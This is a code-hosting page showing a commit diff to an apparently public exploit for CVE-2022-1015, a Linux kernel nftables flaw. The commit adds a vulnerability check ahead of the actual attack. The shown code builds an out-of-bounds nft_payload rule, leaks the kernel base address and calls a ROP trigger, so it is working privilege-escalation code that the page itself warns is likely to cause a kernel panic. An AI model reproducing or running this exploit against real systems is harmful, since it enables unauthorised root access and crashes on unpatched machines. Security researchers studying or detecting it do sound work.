crash.software
Projects
Pull Requests
Issues
Builds
CVE-2022-1015
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY CVE-2022-1015 Commits 72119065
🤬

  • add accurate vuln detection w/o necessarily exploiting.

  • Loading...
  • David committed 2 years ago
    72119065
    1 parent f3140ea9
  • ■ ■ ■ ■ ■ ■
    helpers.h
    skipped 8 lines
    9 9  #pragma once
    10 10  #include <stdint.h>
    11 11   
     12 +#define CLR_RED "\e[0;31m"
     13 +#define CLR_GRN "\e[0;32m"
     14 +#define CLR_RESET "\e[0m"
     15 + 
    12 16  enum nft_types {
    13 17   NFT_TYPE_TABLE = 0,
    14 18   NFT_TYPE_CHAIN,
    skipped 42 lines
  • ■ ■ ■ ■ ■ ■
    make.sh
    1  -musl-gcc -static -I/home/david/linux/linux/usr/include pwn.c helpers.c -lnftnl -lmnl -lcap -o pwn -DDEBUG
    2  - 
  • ■ ■ ■ ■ ■ ■
    pwn.c
    skipped 483 lines
    484 484   execve(new_argv[0], new_argv, envp);
    485 485   puts("Couldn't start unshare wrapper..");
    486 486   puts("Recompile the exploit with an appropriate unshare path.");
     487 + exit(EXIT_FAILURE);
    487 488   }
    488 489   if (strcmp("EXPLOIT", argv[1])) {
    489 490   puts("[-] Something went wrong...");
    skipped 28 lines
    518 519   
    519 520   if (create_base_chain_rule(nl, table_name, base_chain_name, NFPROTO_IPV4, NULL, &seq)) {
    520 521   perror("Failed creating base chain rule");
    521  - puts("[+] Target is NOT vulnerable to CVE-2022-1015");
    522 522   exit(EXIT_FAILURE);
    523 523   }
     524 + 
    524 525   puts("[+] Created base chain rule");
    525  - puts("[+] Target IS vulnerable to CVE-2022-1015");
    526  - puts("[+] Type 'y' to try exploiting the target.");
    527  - puts("!!!BEWARE: THIS IS LIKELY TO CAUSE A KERNEL PANIC!!!");
    528 526  
    529  - char a[4] = {};
    530  - read(0, a, 1);
     527 + // we need to make a rule first in order to replace it
     528 + // in our leaky rule creation. it's a bit of a hack but it works
     529 + // We can also use it to determine whether the system is vulnerable
     530 + // before actually exploiting.
    531 531  
    532  - if (a[0] != 'y') {
    533  - puts("Bye!");
    534  - exit(EXIT_SUCCESS);
     532 + struct vuln_expr_params v;
     533 +
     534 + // offset 0xca and len 0xff is OOB
     535 + if (calc_vuln_expr_params(&v, 0xca, 0x00, 0xff)) {
     536 + puts("[-] Something went horribly wrong...");
     537 + exit(EXIT_FAILURE);
    535 538   }
    536 539  
    537  - // we need to make it first in order to replace it
    538  - // it's a bit of a hack but it works
    539 540   struct nftnl_rule* aux_rule = build_rule(table_name, aux_chain_name, NFPROTO_IPV4, NULL);
    540  - rule_add_immediate_verdict(aux_rule, NF_ACCEPT, NULL);
     541 + rule_add_payload(aux_rule, NFT_PAYLOAD_INNER_HEADER, 8, v.max_len, v.value);
    541 542   
    542 543   err = send_batch_request(
    543 544   nl,
    skipped 3 lines
    547 548   );
    548 549   
    549 550   if (err) {
    550  - perror("Failed creating auxiliary chain rule");
     551 + puts(CLR_RED "[+] TARGET IS NOT VULNERABLE to CVE-2022-1015!" CLR_RESET);
    551 552   exit(EXIT_FAILURE);
    552 553   }
    553 554   
    554  - puts("[+] Created auxilary chain's initial infoleak rule.");
     555 + puts("[+] Succesfully created rule with OOB nft_payload!");
     556 + puts(CLR_GRN "[+] TARGET IS VULNERABLE to CVE-2022-1015!" CLR_RESET);
     557 + puts("[+] Type 'y' to try exploiting the target.");
     558 + puts(CLR_RED "!!!BEWARE: THIS IS LIKELY TO CAUSE A KERNEL PANIC!!!" CLR_RESET);
     559 +
     560 + char a[4] = {};
     561 + read(0, a, 1);
     562 + 
     563 + if (a[0] != 'y') {
     564 + puts("Bye!");
     565 + exit(EXIT_SUCCESS);
     566 + }
    555 567   
    556 568   #define SERVER_HOST "127.0.0.1"
    557 569   #define SERVER_PORT 9999
    skipped 13 lines
    571 583   uint64_t kernel_addr = 0xffffffff00000000 + leak + (LEAK_BASE_OFFSET & 0xff);
    572 584   uint64_t kernel_base = kernel_addr - LEAK_BASE_OFFSET;
    573 585  
    574  - printf("[+] Kernel base @ 0x%.16lx\n", kernel_base);
    575 586  
     587 + // If the kernel base isn't aligned we should probably not continue.
    576 588   if((kernel_base & 0xfffff) != 0) {
    577 589   puts("[-] Leak failed.");
     590 + puts("[-] Try changing offsets / lengths / chain types.");
     591 + puts("[-] If all leaked bytes were ff, this is probably because of corrupted loopback state.. RIP");
    578 592   exit(EXIT_FAILURE);
    579 593   }
    580 594   
     595 + printf("[+] Kernel base @ 0x%.16lx\n", kernel_base);
    581 596   stop_listener(pid);
    582 597   struct unft_base_chain_param bp;
    583 598   bp.hook_num = NF_INET_LOCAL_IN;
    skipped 14 lines
    598 613   trigger_rop(nl, kernel_base, &server, err);
    599 614   after_rop();
    600 615  }
     616 + 
Please wait...
Page is in error, reload to recover